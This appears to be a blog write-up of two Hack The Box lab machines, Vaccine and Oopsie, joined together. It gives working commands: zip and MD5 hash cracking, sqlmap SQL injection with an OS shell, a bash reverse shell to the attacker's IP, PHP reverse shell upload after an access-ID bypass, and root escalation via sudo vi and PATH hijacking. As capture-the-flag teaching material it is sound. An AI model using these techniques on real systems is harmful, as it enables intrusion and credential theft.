backup.zip:$pkzip2$2*2*1*0*8*24*3a41*5722*543fb39ed1a919ce7b58641a238e00f4cb3a826cfb1b8f4b225aa15c4ffda8fe72f60a82*2*0*3da*cca*1b1ccd6a*504*43*8*3da*1b1c*989a*22290dc3505e51d341f31925a7ffefc181ef9f66d8d25e53c82afc7c1598fbc3fff28a17ba9d8cec9a52d66a11ac103f257e14885793fe01e26238915796640e8936073177d3e6e28915f5abf20fb2fb2354cf3b7744be3e7a0a9a798bd40b63dc00c2ceaef81beb5d3c2b94e588c58725a07fe4ef86c990872b652b3dae89b2fff1f127142c95a5c3452b997e3312db40aee19b120b85b90f8a8828a13dd114f3401142d4bb6b4e369e308cc81c26912c3d673dc23a15920764f108ed151ebc3648932f1e8befd9554b9c904f6e6f19cbded8e1cac4e48a5be2b250ddfe42f7261444fbed8f86d207578c61c45fb2f48d7984ef7dcf88ed3885aaa12b943be3682b7df461842e3566700298efad66607052bd59c0e861a7672356729e81dc326ef431c4f3a3cdaf784c15fa7eea73adf02d9272e5c35a5d934b859133082a9f0e74d31243e81b72b45ef3074c0b2a676f409ad5aad7efb32971e68adbbb4d34ed681ad638947f35f43bb33217f71cbb0ec9f876ea75c299800bd36ec81017a4938c86fc7dbe2d412ccf032a3dc98f53e22e066defeb32f00a6f91ce9119da438a327d0e6b990eec23ea820fa24d3ed2dc2a7a56e4b21f8599cc75d00a42f02c653f9168249747832500bfd5828eae19a68b84da170d2a55abeb8430d0d77e6469b89da8e0d49bb24dbfc88f27258be9cf0f7fd531a0e980b6defe1f725e55538128fe52d296b3119b7e4149da3716abac1acd841afcbf79474911196d8596f79862dea26f555c772bbd1d0601814cb0e5939ce6e4452182d23167a287c5a18464581baab1d5f7d5d58d8087b7d0ca8647481e2d4cb6bc2e63aa9bc8c5d4dfc51f9cd2a1ee12a6a44a6e64ac208365180c1fa02bf4f627d5ca5c817cc101ce689afe130e1e6682123635a6e524e2833335f3a44704de5300b8d196df50660bb4dbb7b5cb082ce78d79b4b38e8e738e26798d10502281bfed1a9bb6426bfc47ef62841079d41dbe4fd356f53afc211b04af58fe3978f0cf4b96a7a6fc7ded6e2fba800227b186ee598dbf0c14cbfa557056ca836d69e28262a060a201d005b3f2ce736caed814591e4ccde4e2ab6bdbd647b08e543b4b2a5b23bc17488464b2d0359602a45cc26e30cf166720c43d6b5a1fddcfd380a9c7240ea888638e12a4533cfee2c7040a2f293a888d6dcc0d77bf0a2270f765e5ad8bfcbb7e68762359e335dfd2a9563f1d1d9327eb39e68690a8740fc9748483ba64f1d923edfc2754fc020bbfae77d06e8c94fba2a02612c0787b60f0ee78d21a6305fb97ad04bb562db282c223667af8ad907466b88e7052072d6968acb7258fb8846da057b1448a2a9699ac0e5592e369fd6e87d677a1fe91c0d0155fd237bfd2dc49*$/pkzip2$::backup.zip:style.css, index.php:backup.zip

Foothold Hack

Now that we generated the hash, it was time to hack or crack it using JohnTheRipper. In order to do this we point john at the hash and tell it which wordlist to use. As with all cracking a good place to start is rockyou.txt.

─[10.10.15.199]─[[email protected]]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo john hash.txt — wordlist=/usr/share/wordlists/rockyou.txt
[sudo] password for joe:
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
741852963 (backup.zip)
1g 0:00:00:00 DONE (2021–09–07 19:02) 3.703g/s 15170p/s 15170c/s 15170C/s 123456..samanta
Use the “ — show” option to display all of the cracked passwords reliably
Session completed

Woop! looks like the password is 741852963. I tried to extract the zip file again using the password and it worked. The zip archived appeared to contain a CSS file (Cascading Stylesheet and an index.php file.

─[10.10.15.199]─[[email protected]]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ unzip backup.zip
Archive: backup.zip
[backup.zip] index.php password:
inflating: index.php
inflating: style.css

Since the CSS file was only likely to contain website formatting, I looked at the index.php file first. Well what do you know, it looks like the index.php file had an MD5 password hash hardcoded in to the applications authentication mechanism. Easy pickings for even the most amateur hacker.

<?php
session_start();
if(isset($_POST[‘username’]) && isset($_POST[‘password’])) {
if($_POST[‘username’] === ‘admin’ && md5($_POST[‘password’]) === “2cb42f8734ea607eefed3b70af13bbd3”) {
$_SESSION[‘login’] = “true”;
header(“Location: dashboard.php”);
}}?>

MD5 Hash Crack

A lot of MD5 password hashes can be cracked online using websites like https://crackstation.net. However, you may not always have internet access especially if you are testing a clients internal infrastructure which doesn’t have internet access. For that reason, I decided to use Hashcat. Hashcat is another cracking tool like JohnTheRipper.

─[10.10.15.199]─[[email protected]]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo hashcat -m 0 md5hash.txt /usr/share/wordlists/rockyou.txthashcat (v6.1.1) starting…
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) — Platform #1 [The pocl project]
============================================================
* Device #1: pthread-Intel(R) Core(TM)2 Duo CPU P7550 @ 2.26GHz, 3546/3610 MB (1024 MB allocatable), 2MCU
2cb42f8734ea607eefed3b70af13bbd3:qwerty789
Session……….: hashcat
Status………..: Cracked
Hash.Name……..: MD5
Hash.Target……: 2cb42f8734ea607eefed3b70af13bbd3
Time.Started…..: Tue Sep 7 19:06:05 2021 (0 secs)
Time.Estimated…: Tue Sep 7 19:06:05 2021 (0 secs)
Guess.Base…….: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.#1………: 237.0 kH/s (0.49ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered……..: 1/1 (100.00%) Digests
Progress………: 100352/14344386 (0.70%)
Rejected………: 0/100352 (0.00%)
Restore.Point….: 98304/14344386 (0.69%)
Restore.Sub.#1…: Salt:0 Amplifier:0–1 Iteration:0–1
Candidates.#1….: Donovan -> pacers1

SQL Injection Hack

The hash was successfully cracked, and I must say I was disappointed to learn it was something as simple as qwerty789. Anyway, I was then able to login to the website with the newly cracked password. Upon log in, the website was very basic. The only functionality appeared to be a search box. This instantly made me think the vulnerability was going to be some form of SQL injection. As the website was behind an authentication mechanism, I needed a way to tell SQLMap to authenticate against the application. In order to do this inspected the website and nabbed my PHPSESSID cookie.

The first few attempts to scan the host with SQLMap were unsuccessful as no vulnerability was discovered. It had to be an SQL injection vulnerability because I had exhausted all other avenues of attack other than brute forcing the Secure Shell port. After a bit of research and a lot of reading on the HTB forums, it turns out that if another hacker exploits the SQL injection first then it won’t show as vulnerable when scanned again, not 100% sure why (weird). Anyway after requesting to reset the box a billion times I was finally able to see that the search parameter was vulnerable to SQL Injection.

─[10.10.15.199]─[[email protected]]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo sqlmap -u ‘http://10.10.10.46/dashboard.php?search=a' — cookie=”PHPSESSID=s6j01lrmbrqh5no9pgjdg3ka2a”[*] starting @ 20:08:00 /2021–09–07/
[20:08:01] [INFO] testing connection to the target URL
[20:08:02] [INFO] testing if the target URL content is stable
[20:08:02] [INFO] target URL content is stable
[20:08:02] [INFO] testing if GET parameter ‘search’ is dynamic
[20:08:02] [INFO] GET parameter ‘search’ appears to be dynamic
[20:08:02] [INFO] heuristic (basic) test shows that GET parameter ‘search’ might be injectable (possible DBMS: ‘PostgreSQL’)
---SNIP---
[20:08:09] [INFO] GET parameter ‘search’ appears to be ‘PostgreSQL > 8.1 stacked queries (comment)’ injectable 
[20:08:09] [INFO] testing ‘PostgreSQL > 8.1 AND time-based blind’
[20:08:12] [INFO] GET parameter ‘search’ appears to be ‘PostgreSQL > 8.1 AND time-based blind’ injectable 
[20:08:12] [INFO] testing ‘Generic UNION query (NULL) — 1 to 20 columns’
GET parameter ‘search’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] n

It was time to see whether we could get a shell on the box through SQLMap.

─[10.10.15.199]─[[email protected]]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo sqlmap -u ‘http://10.10.10.46/dashboard.php?search=a' — cookie=”PHPSESSID=s6j01lrmbrqh5no9pgjdg3ka2a” — os-shell[*] starting @ 20:08:20 /2021–09–07/
[20:08:22] [INFO] resuming back-end DBMS ‘postgresql’
[20:08:22] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: search (GET)
---SNIP---
[20:08:23] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[20:08:23] [INFO] fingerprinting the back-end DBMS operating system
[20:08:24] [INFO] the back-end DBMS operating system is Linux
[20:08:24] [INFO] testing if current user is DBA
[20:08:25] [INFO] retrieved: ‘1’
[20:08:25] [INFO] going to use ‘COPY … FROM PROGRAM …’ command execution
[20:08:25] [INFO] calling Linux OS shell. To quit type ‘x’ or ‘q’ and press ENTER

Brilliant, this gave us an os-shell. In order to upgrade it to a full shell I needed to create a netcat listener and run a command on the server to get it to connect back to my host. First I created the netcat listener.

─[10.10.15.199]─[[email protected]]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo nc -lvp 1234

Then I ran the command on the target server.

os-shell> bash -c ‘bash -i >& /dev/tcp/10.10.15.99/1234 0>&1

The command worked and the target server connected by to my host netcat listener.

10.10.10.46: inverse host lookup failed: Unknown host
connect to [10.10.15.199] from (UNKNOWN) [10.10.10.46] 38336
bash: cannot set terminal process group (1502): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/var/lib/postgresql/11/main$ whoami
postgres

Privilege Escalation Hack

Now that I had access to the server it was time to perform some further investigation. I checked the history and then started looking through the website files. I found one file called dashboard.php.

[email protected]:/var/lib/postgresql/11/main$ cat /var/www/html/dashboard.php
if($_SESSION[‘login’] !== “true”) {
header(“Location: index.php”);
die();
}
try {
$conn = pg_connect(“host=localhost port=5432 dbname=carsdb user=postgres [email protected]!”);}

Bingo, we found a PHP database connection string with the postgres users password. I was then able to use the password to see what the postgres user had permissions to run.

[email protected]:/var/lib/postgresql/11/main$ sudo -l
[sudo] password for postgres: [email protected]!
Matching Defaults entries for postgres on vaccine:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

It appeared as that the postgres user had the ability to edit the pg_hba.conf configuration file using the vi tool. This was great news as vi has a built-in terminal that allows you to execute commands. After running the /bin/vi /etc/postgresql/11/main/pg_hba.conf command you can press escape and then type :!/bin/bash. This drop you in to a root shell where you can snag the root.txt file. There is no user.txt file on this target.

[email protected]:/var/lib/postgresql/11/main# cat /root/root.txt
cat /root/root.txt
dd6XXXXXXXXXXXXXXXXXXXXXX849

Hello again, it’s time for another Hack The Box adventure as we take on Oopsie.

Reconnaissance

As always, I started by spinning up the target host and connecting to the VPN. Once connected I ran an Nmap scan to see what services were availible.

sudo nmap -sC -sV -O -p0- 10.10.10.28
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; 
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

The Nmap scan showed that only port 22 (Secure Shell) and port 80 (HTTP) were open. As there wasn’t much point trying to hack the SSH login via brute force (and as it isn’t a preferred method of exploiting a box) I started by browsing the website. The website was fairly basic and at first glance didn’t offer much.

There are many tools to crawl/spider a website such as dirb and gobuster but on this occasion I used Burp Suite. Using Burp Suite. Burp Suite is a web application security analysis or hacking tool. I turned off intercept and loaded the website in the built in Burp Browser (Chromimum).

Burp has a built in spidering/crawling tool that will search through the contents of the web page. The application appeared to have a login url at the following extension.

http://10.10.10.28/cdn-cgi/login.php

Crawling the rest of the website didn’t appear to reveal any other sensitive directories or information. There was a login page but no credentials. We could have tried to hack the login page using a brute force attack with intruder but first lets try the credentials we found on the previous box Archetype.

BINGO, the MEGACORP_4dm1n!! password from the Archetype box history worked. The first thing I noticed when logged in was that there was an upload page. Unfortunately it’s never that simple. Visiting the upload page returned an error that I needed to be super admin. Looking around the site a bit more revealed some interesting information on the Repair Management System page.

The admin user appeared to have an “access ID”. I wanted to investigate this “access ID” further so I captured the request using Burp intercept and noticed that when viewing the account page, there was an $id paramter.

I sent this request to Burp Intruder and cleared the payloads. Once the payloads were cleared I added a payload to the value 1 in the $id parameter. I then used seq on linux to generate a payload list.

seq 1 100
1
2
3
snipped
98
99
100

I then copied and pasted the results in the payload section of intruder. There was one final option to configure before moving forward. In the options tab there is setting to follow redirections and to process cookies in redirections. Both of those needed to be ticked in order to launch the hack properly.

Once the settings were in place, I launched the hack. One tip for intruder attacks is to sort the results by the response length. Most of the time you will find that the response length is the same. However, if there is something interesting then the length of the response will likely be different. BINGO, the 30th request contained the information I needed. It looks like the super admin id was 30 and the Access ID 86575.

I then turned intercept back on and made a request to the upload page. Burp suite intercepted the response and allowed me to edit it before sending the response to the server. I modified the Access ID value to that of the super admin and forwarded the request. The request was accepted by the server and I was allowed to access the upload page.

Foothold Hack

I used this PHP reverse shell script and modified it with my IP address and desired port. Next I needed to upload it to the website making sure to modify the Access ID value to the super admin Access ID when submitting the payload. I then set up my netcat listener.

sudo nc -lvp 1234

Once the listener was running it was time to find out where the script was uploaded to. As I said previously, there are many tools to do this including dirbuster and gobuster but in this instance, burp had already found the uploads directory. Using cURL I called the PHP script to trigger the reverse shell connection back to my machine. You could also visit the script directly in your browser to trigger it.

curl http://10.10.10.28/uploads/phpshell.php

I checked the history and didn’t find anything useful so I then listed out the contents of the home directory and found the user robert. I was able to read the contents of the user roberts home directory including the user.txt flag.

$ whoami
 www-data
$ ls home
 robert
$ ls home/robert
 user.txt
$ cat /home/robert/user.txt
 f2cXXXXXXXXXXXXXXXXXXXX981

After getting the user.txt file I decided to poke around on the server a bit more. I thought it best to check the web directory to see if there was anything I missed. As it turns out there was a db.php file which contained a username and password.

$ ls /var/www/html/cdn-cgi/login
 admin.php db.php index.php script.js
$ cat /var/www/html/cdn-cgi/login/db.php
 <?php
 $conn = mysqli_connect(‘localhost’,’robert’,’M3g4C0rpUs3r!’,’garage’);
 ?>

Privilege Escalation Hack

This appeared to be the password for the robert user so I decided to switch to the robert user and see what he had permission to run by using the id command.

[email protected]:/$ id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)

robert had access to an interesting file called bugtracker. This was likely going to be the method of priveledge escalation so I decided to check it out. Using the tool strings on the bugtracker file it became evident that there was a clear path to privilege escalation.

[email protected]:/$ strings /usr/bin/bugtracker
 /lib64/ld-linux-x86–64.so.2
SNIP
 — — — — — — — — — 
 : EV Bug Tracker :
 — — — — — — — — — 
 Provide Bug ID: 
 — — — — — — — -
 cat /root/reports/

The file was calling the cat tool without the full path. This meant we could change our PATH environmental variable and make the cat tool to do something else, then when the script runs it will execute whatever we have put inside our newly created cat file. In this instance we created a new cat file in /tmp that when ran would spawn a shell.

export PATH=/tmp:$PATH
cd /tmp/
echo ‘/bin/sh’ > cat
chmod +x cat

Then when we run /usr/bin/bugtracker we are dropped in to a root shell where we can capture the root.txt file.

/usr/bin/bugtracker
 cat /root/root.txt
 af13b0bee69f8a877c3faf667f7beacf